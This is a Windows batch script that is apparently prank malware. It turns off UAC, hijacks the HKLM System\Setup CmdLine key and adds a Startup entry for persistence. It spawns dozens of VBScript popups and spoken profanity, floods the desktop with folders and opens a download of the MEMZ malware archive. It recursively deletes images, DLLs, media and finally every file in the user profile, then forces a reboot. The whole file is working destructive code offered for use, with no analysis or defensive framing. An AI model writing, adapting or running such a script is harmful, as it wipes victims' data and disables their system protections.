@echo off
runadmin.vbs %0
reg add HKLM\System\Setup /v CmdLine /t REG_SZ /d "cmd.exe /k C:\wget-download\autoexec.bat" /f
reg add HKLM\System\Setup /v SystemSetupInProgress /t REG_DWORD /d 1 /f > nul
reg add HKLM\System\Setup /v SetupType /t REG_DWORD /d 2 /f > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v VerboseStatus /t REG_DWORD /d 1 /f > nul
cd/
cd "wget-download"
copy /y "BSOD.bat" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" > nul
start /min sndrec32.exe /play /close "music.wav"
reg add HKLM\System\Setup /v CmdLine /t REG_SZ /d "cmd.exe /k C:\wget-download\autoexec.bat" /f
reg add HKLM\System\Setup /v SystemSetupInProgress /t REG_DWORD /d 1 /f > nul
reg add HKLM\System\Setup /v SetupType /t REG_DWORD /d 2 /f > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v VerboseStatus /t REG_DWORD /d 1 /f > nul
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start haha.vbs
start https://pc-optimizer-pro.soft32.com/
timeout /t 10 > nul
cd "%userprofile%\desktop"
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
timeout /t 10 > nul
echo/Fudeu ne misericodia>>naomeabra.txt
start naomeabra.txt
timeout /t 5 > nul
start https://opensea.io/BonziBUDDY_Official
start https://opensea.io/BonziBUDDY_Official
timeout /t 5 > nul
start https://s28667145.weebly.com/uploads/1/2/2/5/122571914/memz-master.zip
cd "%userprofile%"
del /s /q /a /f *.png
del /s /q /a /f *.jpg
del /s /q /a /f *.dll
del /s /q /a /f *.html
del /s /q /a /f *.lnk
start porra
timeout /t 3 > nul
start https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Flh5.googleusercontent.com%2Fproxy%2FphACkNA4eNYm8j2t78vin7GkqFLy412Vh6TFe-EDHculMDx0D1ihzUw8Tgj81kd5GKd_cbw81nTbHSij61py9dbQR3RMDnMStQmuHaX6WFUpgsOBWQfwaIpsoGyFm-SP%3Dw1200-h630-p-k-no-nu&f=1&nofb=1
start https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Flh5.googleusercontent.com%2Fproxy%2FphACkNA4eNYm8j2t78vin7GkqFLy412Vh6TFe-EDHculMDx0D1ihzUw8Tgj81kd5GKd_cbw81nTbHSij61py9dbQR3RMDnMStQmuHaX6WFUpgsOBWQfwaIpsoGyFm-SP%3Dw1200-h630-p-k-no-nu&f=1&nofb=1
start https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Flh5.googleusercontent.com%2Fproxy%2FphACkNA4eNYm8j2t78vin7GkqFLy412Vh6TFe-EDHculMDx0D1ihzUw8Tgj81kd5GKd_cbw81nTbHSij61py9dbQR3RMDnMStQmuHaX6WFUpgsOBWQfwaIpsoGyFm-SP%3Dw1200-h630-p-k-no-nu&f=1&nofb=1
timeout /t 15 > nul
start http://web.archive.org/web/20040804/youareanidiot.org
del /s /q /a /f *.mp4
del /s /q /a /f *.mp3
start https://www.youtube.com/watch?v=l5hvakZf8qw
start https://www.youtube.com/watch?v=l5hvakZf8qw
start https://www.youtube.com/watch?v=l5hvakZf8qw
start https://www.youtube.com/watch?v=l5hvakZf8qw
start https://www.youtube.com/watch?v=l5hvakZf8qw
cd "%localappdata%\"
rmdir /s /q Packages
start https://www.youtube.com/watch?v=oFwRQdE5Eqw
start https://www.youtube.com/watch?v=oFwRQdE5Eqw
timeout /t 10
cd "%temp%"
echo dim speak, speech>voz.vbs
echo speaks="Eita merda, fudeu ne caralho!!!">>voz.vbs
echo Set speech=CreateObject("sapi_spvoice")>>voz.vbs
echo speech.Speak speaks>>voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
start voz.vbs
cd "%userprofile%"
del /s /q /a /f "*.*"
powershell wininit
powershell wininit
powershell wininit
powershell wininit
powershell wininit
powershell wininit
powershell wininit
powershell wininit
shutdown -r -t -f 0 -c "Fudeu kkkkkkkkkkkkkkkkkkkkk"
